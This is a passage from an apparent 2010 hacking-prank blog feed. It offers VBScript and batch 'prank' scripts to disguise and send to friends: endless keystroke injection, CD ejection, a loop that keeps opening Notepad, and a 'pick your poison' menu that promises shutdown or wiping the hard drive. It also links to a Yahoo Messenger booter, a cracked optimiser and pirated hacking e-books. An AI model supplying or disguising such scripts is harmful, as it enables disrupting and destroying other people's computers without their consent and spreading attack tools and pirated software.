Next&lt;br /&gt;
For i = 0 to colCDROMs.Count - 1&lt;br /&gt;
colCDROMs.Item(i).Eject&lt;br /&gt;
Next&lt;br /&gt;
End If&lt;br /&gt;
wscript.sleep 5000&lt;br /&gt;
loop&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;4) Frustrate your friend by making this VBScript hit Enter simultaneously:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Set wshShell = wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys &quot;~(enter)&quot;&lt;br /&gt;
loop&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;5) Open Notepad, slowly type &quot;Hello, how are you? I am good thanks&quot; and freak your friend out:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
WScript.Sleep 180000&lt;br /&gt;
WScript.Sleep 10000&lt;br /&gt;
Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;
WshShell.Run &quot;notepad&quot;&lt;br /&gt;
WScript.Sleep 100&lt;br /&gt;
WshShell.AppActivate &quot;Notepad&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;Hel&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;lo &quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;, ho&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;w a&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;re &quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;you&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;? &quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;I a&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;m g&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;ood&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot; th&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;ank&quot;&lt;br /&gt;
WScript.Sleep 500&lt;br /&gt;
WshShell.SendKeys &quot;s! &quot;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;6) Frustrate your friend by making this VBScript hit Backspace simultaneously:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
MsgBox &quot;Let&#39;s go back a few steps&quot;&lt;br /&gt;
Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys &quot;{bs}&quot;&lt;br /&gt;
loop&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;7) Hack your friend&#39;s keyboard and make him type &quot;You are a fool&quot; simultaneously:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Set wshShell = wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys &quot;You are a fool.&quot;&lt;br /&gt;
loop&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.VBS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;8. Open Notepad continually in your friend&#39;s computer:&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
@ECHO off&lt;br /&gt;
:top&lt;br /&gt;
START %SystemRoot%\system32\notepad.exe&lt;br /&gt;
GOTO top&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.BAT&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:&lt;br /&gt;
&lt;br /&gt;
1: Shutdown&lt;br /&gt;
2: Restart&lt;br /&gt;
3: Wipes out your hard drive (BEWARE)&lt;br /&gt;
4: Net send&lt;br /&gt;
5: Messages then shutdown&lt;br /&gt;
Type :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
title The end of the world&lt;br /&gt;
cd C:\&lt;br /&gt;
:menu&lt;br /&gt;
cls&lt;br /&gt;
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press &#39;x&#39; then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...&lt;br /&gt;
pause&lt;br /&gt;
echo Pick your poison:&lt;br /&gt;
echo 1. Die this way (Wimp)&lt;br /&gt;
echo 2. Die this way (WIMP!)&lt;br /&gt;
echo 3. DO NOT DIE THIS WAY&lt;br /&gt;
echo 4. Die this way (you&#39;re boring)&lt;br /&gt;
echo 5. Easy way out&lt;br /&gt;
set input=nothing&lt;br /&gt;
set /p input=Choice:&lt;br /&gt;
if %input%==1 goto one&lt;br /&gt;
if %input%==2 goto two&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Save&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;it as &quot;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Anything.BAT&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&quot; and send it.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;You&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;might wanna have to&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;change the Icon&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;of the file before sending it to your friend, so&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;right click&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;the file, click&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;Properties&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;, click on the&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;&#39;Change&#39;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&amp;nbsp;Icon and&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;change the icon from there.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/05/10-most-dangerous-scripts-to-prank-your.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-3130193881331001964</guid><pubDate>Fri, 21 May 2010 15:15:00 +0000</pubDate><atom:updated>2010-07-22T16:46:17.343+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Messenger</category><title>Yahoo Booter</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWKutnde4E160-lcbaq5MretxaY5PkPpwLEB2pLF_QhsmCgIewQFWmlsfyRSw9On-xiZpyuBjWPrI_NYPU-d-Addo-jSHitAWVZMAvbc1dxPAkAqr15yqSVzL4QnDV14C8fP3mhWKUFQQR/s1600/177hvr.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWKutnde4E160-lcbaq5MretxaY5PkPpwLEB2pLF_QhsmCgIewQFWmlsfyRSw9On-xiZpyuBjWPrI_NYPU-d-Addo-jSHitAWVZMAvbc1dxPAkAqr15yqSVzL4QnDV14C8fP3mhWKUFQQR/s320/177hvr.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: 12pt;&quot;&gt;for downloads YMSG12ENCRYPT.dll&lt;br /&gt;
click &lt;a href=&quot;http://www.4shared.com/file/66459041...ified=752c9450&quot;&gt;here&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 12pt;&quot;&gt;and download Kingstaa Boot v1 - Yahoo booter&lt;br /&gt;
&lt;a href=&quot;http://rapidshare.com/files/21761639...aa_Boot_v1.rar&quot;&gt;here&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt; &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/05/yahoo-booter.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWKutnde4E160-lcbaq5MretxaY5PkPpwLEB2pLF_QhsmCgIewQFWmlsfyRSw9On-xiZpyuBjWPrI_NYPU-d-Addo-jSHitAWVZMAvbc1dxPAkAqr15yqSVzL4QnDV14C8fP3mhWKUFQQR/s72-c/177hvr.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-6524151494896649548</guid><pubDate>Wed, 19 May 2010 16:03:00 +0000</pubDate><atom:updated>2010-05-19T21:34:53.030+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><title>Hack Any Game With GameGain ( Make Games Run Faster)</title><description>&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpTBsRsyhqA-ttypwd_Ni6NnL5rqH3432BNVfPECqdP9QPLwR2YvJ9VG7insydkukobQBIAdqDeuxQni1Ew1Yh2Q2UNxzXJW1AnQKu8u6D64-OmFPXxnqQ7WfSST2oGjHNIbkEeQxZI0f6/s1600/4ktvdl.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpTBsRsyhqA-ttypwd_Ni6NnL5rqH3432BNVfPECqdP9QPLwR2YvJ9VG7insydkukobQBIAdqDeuxQni1Ew1Yh2Q2UNxzXJW1AnQKu8u6D64-OmFPXxnqQ7WfSST2oGjHNIbkEeQxZI0f6/s320/4ktvdl.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: #fff2cc; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;GameGain 2.2.22.2010 | 1.62 Mb&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: black; text-align: left;&quot;&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;GameGain is a tool that optimizes your system&#39;s performance and makes your games run better.GameGain is based off our popular PCMedik software GameGain differentiates itself by focusing entirely on gaming performance upgrades only.Playing computer games that run entirely too slow or show poor performance? GameGain attempts to solve such problems and at the same time increase computing performance.&lt;br /&gt;
&lt;br /&gt;
GameGain boosts &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;your computer gaming performance by modifying several system settings, so you can now use that old computer or new computer of yours as your primary gaming station. No installation or modification needs to be made to your hardware, GameGain does all the complicated settings for you instantly.&lt;br /&gt;
&lt;br /&gt;
GameGain works on all 32 bit platforms of Windows. From Windows 95 up to the latest Windows XP you will enjoy the benefits that GameGain will bring.&lt;br /&gt;
&lt;br /&gt;
Simply choose your operating system, select the processor type you&#39;re using and then choose the speed setting you want and hit the &#39;GO&#39; button and you will notice performance increases for gaming that your computer has never seen before.&lt;br /&gt;
&lt;br /&gt;
We wont promise that GameGain will do wonders and make your computer work at astronomical speeds, but you will notice your computer working much smoother and overall performance greatly improved.&lt;br /&gt;
&lt;br /&gt;
Here are some key features of &quot;GameGain&quot;:&lt;br /&gt;
&lt;br /&gt;
· Makes direct changes to system registry and system files to enhance memory, screen drawing, animations, refresh rates, cpu threading speeds.&lt;br /&gt;
· Automatically adjusts settings and changes made based on computer specifications, complete fault tolerance system implemented.&lt;br /&gt;
· Proven technology which can double the frames per second rate in games such as id Software&#39;s DOOM 3 and similar shooters.&lt;br /&gt;
· Deep system analyzer and diagnostic features which attempt to find and repair any potential problems with the computer affecting its performance.&lt;br /&gt;
· Advanced software based over-clocking features to enhance memory and cpu priorities.&lt;br /&gt;
· Easy and intuitive user interface which performs all setting changes immediately.&lt;br /&gt;
· Try before you buy licensing with FREE lifetime upgrades and quality technical support.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: black; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;&lt;a href=&quot;http://hotfile.com/dl/30941726/a1e5adf/GameGain_2.2.22.2010.rar.html&quot;&gt;Download Link &lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://hack-fun.blogspot.com/2010/05/httphotfile.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpTBsRsyhqA-ttypwd_Ni6NnL5rqH3432BNVfPECqdP9QPLwR2YvJ9VG7insydkukobQBIAdqDeuxQni1Ew1Yh2Q2UNxzXJW1AnQKu8u6D64-OmFPXxnqQ7WfSST2oGjHNIbkEeQxZI0f6/s72-c/4ktvdl.gif" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-5253884871412459960</guid><pubDate>Wed, 19 May 2010 15:56:00 +0000</pubDate><atom:updated>2010-05-19T21:27:45.853+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><title>Best Hacking Collection 34 in 1 AIO (Must Have)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6t_sfpA0q9BpK91_qFqxSqYMoXKH_VXxhirAWebLytK52Lqzj0YJZv5RXV9HXOvHYJs1_TXlBeaGD46Z2BEvQOhiPXo0xfhtwFSEuoGIYgX6_vPisJi7NA-0CIdrFjmqDeehD6KvuVYkv/s320/TheMostDangerousHackTool2009.jpg&quot; /&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; style=&quot;color: #fff2cc;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Best Hacking Collection 34 in 1 AIO&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
137.37 MB&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; style=&quot;color: #fff2cc;&quot;&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; style=&quot;color: #fff2cc;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: #fff2cc; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Contains&lt;br /&gt;
&lt;br /&gt;
BlueTooth Hacking&lt;br /&gt;
Ethical Hacking&lt;br /&gt;
Google Hacks&lt;br /&gt;
Hack and Crack&lt;br /&gt;
Hack Attacks Revealed&lt;br /&gt;
Hack Attacks Testing How To Conduct Your Own Security Audit&lt;br /&gt;
Hack IT Security Through Penetration Testing&lt;br /&gt;
Hack Proofing Your Network Internet Tradecraft&lt;br /&gt;
Hack Proofing Your Network Second Edition&lt;br /&gt;
Hack Proofing Your Web Server&lt;br /&gt;
Hack The Net&lt;br /&gt;
Hack Xbox 360&lt;br /&gt;
Hackers Black Book&lt;br /&gt;
Hacking Firewalls And Networks How To Hack Into Remote Computers&lt;br /&gt;
Hacking a Coke Machine&lt;br /&gt;
Hacking and Network Defense&lt;br /&gt;
Hacking for Dummies&lt;br /&gt;
Hacking Intranet Websites&lt;br /&gt;
Hacking Techniques&lt;br /&gt;
Hacking The Cable Modem&lt;br /&gt;
Hacking The Linux&lt;br /&gt;
Hacking Web Applications&lt;br /&gt;
Hacking Windows XP&lt;br /&gt;
Hacking PSP&lt;br /&gt;
Kevin Mitnick The Art of Deception&lt;br /&gt;
Kevin Mitnick The Art of Intrusion&lt;br /&gt;
Network Security Hacks Tips and Tools For Protecting Your Privacy&lt;br /&gt;
PayPal Hacks&lt;br /&gt;
PC Hacks&lt;br /&gt;
Simple Hacks Addons, Macros And More&lt;br /&gt;
The Database Hacker Handbook Defending Database Servers&lt;br /&gt;
Wireless Hacking&lt;br /&gt;
Wireless Network Hacks and Mods for Dummies&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: #fff2cc; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;color: #fff2cc; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Download Links&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;color: blue; text-align: left;&quot;&gt;&lt;a href=&quot;http://hotfile.com/dl/37542923/be35dd5/Hacking_eBook_AIO.part1.rar.html&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Link 1(Part 1)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;a 